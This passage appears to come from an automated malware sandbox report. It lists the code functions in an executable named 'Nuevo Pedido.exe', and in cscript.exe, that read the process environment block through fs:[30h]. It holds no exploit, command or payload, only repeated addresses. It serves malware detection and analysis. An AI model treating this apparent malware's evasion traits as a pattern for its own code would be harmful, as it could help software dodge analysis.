Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EA44B mov eax, dword ptr fs:[00000030h] 3_2_019EA44B
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D746D mov eax, dword ptr fs:[00000030h] 3_2_019D746D
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A4C450 mov eax, dword ptr fs:[00000030h] 3_2_01A4C450
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A4C450 mov eax, dword ptr fs:[00000030h] 3_2_01A4C450
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C8794 mov eax, dword ptr fs:[00000030h] 3_2_019C8794
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A37794 mov eax, dword ptr fs:[00000030h] 3_2_01A37794
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A37794 mov eax, dword ptr fs:[00000030h] 3_2_01A37794
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A37794 mov eax, dword ptr fs:[00000030h] 3_2_01A37794
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F37F5 mov eax, dword ptr fs:[00000030h] 3_2_019F37F5
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019DF716 mov eax, dword ptr fs:[00000030h] 3_2_019DF716
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EA70E mov eax, dword ptr fs:[00000030h] 3_2_019EA70E
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EA70E mov eax, dword ptr fs:[00000030h] 3_2_019EA70E
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A8070D mov eax, dword ptr fs:[00000030h] 3_2_01A8070D
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A8070D mov eax, dword ptr fs:[00000030h] 3_2_01A8070D
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EE730 mov eax, dword ptr fs:[00000030h] 3_2_019EE730
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A4FF10 mov eax, dword ptr fs:[00000030h] 3_2_01A4FF10
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A4FF10 mov eax, dword ptr fs:[00000030h] 3_2_01A4FF10
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B4F2E mov eax, dword ptr fs:[00000030h] 3_2_019B4F2E
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B4F2E mov eax, dword ptr fs:[00000030h] 3_2_019B4F2E
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A88F6A mov eax, dword ptr fs:[00000030h] 3_2_01A88F6A
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019CEF40 mov eax, dword ptr fs:[00000030h] 3_2_019CEF40
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019CFF60 mov eax, dword ptr fs:[00000030h] 3_2_019CFF60
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A346A7 mov eax, dword ptr fs:[00000030h] 3_2_01A346A7
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A80EA5 mov eax, dword ptr fs:[00000030h] 3_2_01A80EA5
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A80EA5 mov eax, dword ptr fs:[00000030h] 3_2_01A80EA5
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A80EA5 mov eax, dword ptr fs:[00000030h] 3_2_01A80EA5
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A4FE87 mov eax, dword ptr fs:[00000030h] 3_2_01A4FE87
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E36CC mov eax, dword ptr fs:[00000030h] 3_2_019E36CC
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F8EC7 mov eax, dword ptr fs:[00000030h] 3_2_019F8EC7
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A6FEC0 mov eax, dword ptr fs:[00000030h] 3_2_01A6FEC0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A88ED6 mov eax, dword ptr fs:[00000030h] 3_2_01A88ED6
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E16E0 mov ecx, dword ptr fs:[00000030h] 3_2_019E16E0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C76E2 mov eax, dword ptr fs:[00000030h] 3_2_019C76E2
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EA61C mov eax, dword ptr fs:[00000030h] 3_2_019EA61C
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EA61C mov eax, dword ptr fs:[00000030h] 3_2_019EA61C
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A6FE3F mov eax, dword ptr fs:[00000030h] 3_2_01A6FE3F
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BC600 mov eax, dword ptr fs:[00000030h] 3_2_019BC600
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BC600 mov eax, dword ptr fs:[00000030h] 3_2_019BC600
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BC600 mov eax, dword ptr fs:[00000030h] 3_2_019BC600
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E8E00 mov eax, dword ptr fs:[00000030h] 3_2_019E8E00
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A71608 mov eax, dword ptr fs:[00000030h] 3_2_01A71608
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BE620 mov eax, dword ptr fs:[00000030h] 3_2_019BE620
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h] 3_2_019C7E41
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h] 3_2_019C7E41
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h] 3_2_019C7E41
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h] 3_2_019C7E41
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h] 3_2_019C7E41
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h] 3_2_019C7E41
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7AE44 mov eax, dword ptr fs:[00000030h] 3_2_01A7AE44
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7AE44 mov eax, dword ptr fs:[00000030h] 3_2_01A7AE44
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h] 3_2_019DAE73
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h] 3_2_019DAE73
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h] 3_2_019DAE73
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h] 3_2_019DAE73
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h] 3_2_019DAE73
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C766D mov eax, dword ptr fs:[00000030h] 3_2_019C766D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479746D mov eax, dword ptr fs:[00000030h] 16_2_0479746D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AA44B mov eax, dword ptr fs:[00000030h] 16_2_047AA44B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04848CD6 mov eax, dword ptr fs:[00000030h] 16_2_04848CD6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047ABC2C mov eax, dword ptr fs:[00000030h] 16_2_047ABC2C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h] 16_2_047F6C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h] 16_2_047F6C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h] 16_2_047F6C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h] 16_2_047F6C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048314FB mov eax, dword ptr fs:[00000030h] 16_2_048314FB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h] 16_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0484740D mov eax, dword ptr fs:[00000030h] 16_2_0484740D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0484740D mov eax, dword ptr fs:[00000030h] 16_2_0484740D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0484740D mov eax, dword ptr fs:[00000030h] 16_2_0484740D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h] 16_2_047F6CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h] 16_2_047F6CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h] 16_2_047F6CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480C450 mov eax, dword ptr fs:[00000030h] 16_2_0480C450
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480C450 mov eax, dword ptr fs:[00000030h] 16_2_0480C450
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478849B mov eax, dword ptr fs:[00000030h] 16_2_0478849B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479C577 mov eax, dword ptr fs:[00000030h] 16_2_0479C577
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479C577 mov eax, dword ptr fs:[00000030h] 16_2_0479C577
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048405AC mov eax, dword ptr fs:[00000030h] 16_2_048405AC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048405AC mov eax, dword ptr fs:[00000030h] 16_2_048405AC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04797D50 mov eax, dword ptr fs:[00000030h] 16_2_04797D50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B3D43 mov eax, dword ptr fs:[00000030h] 16_2_047B3D43
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F3540 mov eax, dword ptr fs:[00000030h] 16_2_047F3540
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h] 16_2_047A4D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h] 16_2_047A4D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h] 16_2_047A4D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477AD30 mov eax, dword ptr fs:[00000030h] 16_2_0477AD30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047FA537 mov eax, dword ptr fs:[00000030h] 16_2_047FA537
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h] 16_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h] 16_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h] 16_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h] 16_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h] 16_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h] 16_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h] 16_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h] 16_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h] 16_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h] 16_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h] 16_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h] 16_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h] 16_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h] 16_2_0483FDE2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h] 16_2_0483FDE2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h] 16_2_0483FDE2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h] 16_2_0483FDE2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04828DF1 mov eax, dword ptr fs:[00000030h] 16_2_04828DF1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478D5E0 mov eax, dword ptr fs:[00000030h] 16_2_0478D5E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478D5E0 mov eax, dword ptr fs:[00000030h] 16_2_0478D5E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04848D34 mov eax, dword ptr fs:[00000030h] 16_2_04848D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h] 16_2_047F6DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h] 16_2_047F6DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h] 16_2_047F6DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6DC9 mov ecx, dword ptr fs:[00000030h] 16_2_047F6DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h] 16_2_047F6DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h] 16_2_047F6DC9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483E539 mov eax, dword ptr fs:[00000030h] 16_2_0483E539
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h] 16_2_047A1DB5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h] 16_2_047A1DB5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h] 16_2_047A1DB5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A35A1 mov eax, dword ptr fs:[00000030h] 16_2_047A35A1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AFD9B mov eax, dword ptr fs:[00000030h] 16_2_047AFD9B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AFD9B mov eax, dword ptr fs:[00000030h] 16_2_047AFD9B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h] 16_2_047A2581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h] 16_2_047A2581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h] 16_2_047A2581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h] 16_2_047A2581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h] 16_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h] 16_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h] 16_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h] 16_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h] 16_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480FE87 mov eax, dword ptr fs:[00000030h] 16_2_0480FE87
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h] 16_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h] 16_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h] 16_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h] 16_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h] 16_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478766D mov eax, dword ptr fs:[00000030h] 16_2_0478766D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h] 16_2_04840EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h] 16_2_04840EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h] 16_2_04840EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h] 16_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h] 16_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h] 16_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h] 16_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h] 16_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h] 16_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0482FEC0 mov eax, dword ptr fs:[00000030h] 16_2_0482FEC0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04848ED6 mov eax, dword ptr fs:[00000030h] 16_2_04848ED6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477E620 mov eax, dword ptr fs:[00000030h] 16_2_0477E620
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AA61C mov eax, dword ptr fs:[00000030h] 16_2_047AA61C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AA61C mov eax, dword ptr fs:[00000030h] 16_2_047AA61C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h] 16_2_0477C600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h] 16_2_0477C600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h] 16_2_0477C600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A8E00 mov eax, dword ptr fs:[00000030h] 16_2_047A8E00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831608 mov eax, dword ptr fs:[00000030h] 16_2_04831608
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A16E0 mov ecx, dword ptr fs:[00000030h] 16_2_047A16E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047876E2 mov eax, dword ptr fs:[00000030h] 16_2_047876E2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A36CC mov eax, dword ptr fs:[00000030h] 16_2_047A36CC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B8EC7 mov eax, dword ptr fs:[00000030h] 16_2_047B8EC7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0482FE3F mov eax, dword ptr fs:[00000030h] 16_2_0482FE3F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483AE44 mov eax, dword ptr fs:[00000030h] 16_2_0483AE44
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483AE44 mov eax, dword ptr fs:[00000030h] 16_2_0483AE44
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F46A7 mov eax, dword ptr fs:[00000030h] 16_2_047F46A7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478FF60 mov eax, dword ptr fs:[00000030h] 16_2_0478FF60
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478EF40 mov eax, dword ptr fs:[00000030h] 16_2_0478EF40
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AE730 mov eax, dword ptr fs:[00000030h] 16_2_047AE730
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04774F2E mov eax, dword ptr fs:[00000030h] 16_2_04774F2E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04774F2E mov eax, dword ptr fs:[00000030h] 16_2_04774F2E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0479F716 mov eax, dword ptr fs:[00000030h] 16_2_0479F716
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AA70E mov eax, dword ptr fs:[00000030h] 16_2_047AA70E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AA70E mov eax, dword ptr fs:[00000030h] 16_2_047AA70E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0484070D mov eax, dword ptr fs:[00000030h] 16_2_0484070D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0484070D mov eax, dword ptr fs:[00000030h] 16_2_0484070D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B37F5 mov eax, dword ptr fs:[00000030h] 16_2_047B37F5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480FF10 mov eax, dword ptr fs:[00000030h] 16_2_0480FF10
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480FF10 mov eax, dword ptr fs:[00000030h] 16_2_0480FF10
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h] 16_2_047F7794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h] 16_2_047F7794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h] 16_2_047F7794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04788794 mov eax, dword ptr fs:[00000030h] 16_2_04788794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04848F6A mov eax, dword ptr fs:[00000030h] 16_2_04848F6A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04790050 mov eax, dword ptr fs:[00000030h] 16_2_04790050
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04790050 mov eax, dword ptr fs:[00000030h] 16_2_04790050
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 16_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480B8D0 mov ecx, dword ptr fs:[00000030h] 16_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 16_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 16_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 16_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h] 16_2_0480B8D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h] 16_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h] 16_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h] 16_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h] 16_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A002D mov eax, dword ptr fs:[00000030h] 16_2_047A002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A002D mov eax, dword ptr fs:[00000030h] 16_2_047A002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A002D mov eax, dword ptr fs:[00000030h] 16_2_047A002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A002D mov eax, dword ptr fs:[00000030h] 16_2_047A002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A002D mov eax, dword ptr fs:[00000030h] 16_2_047A002D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h] 16_2_047F7016
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h] 16_2_047F7016
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h] 16_2_047F7016
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04844015 mov eax, dword ptr fs:[00000030h] 16_2_04844015
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04844015 mov eax, dword ptr fs:[00000030h] 16_2_04844015
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047758EC mov eax, dword ptr fs:[00000030h] 16_2_047758EC
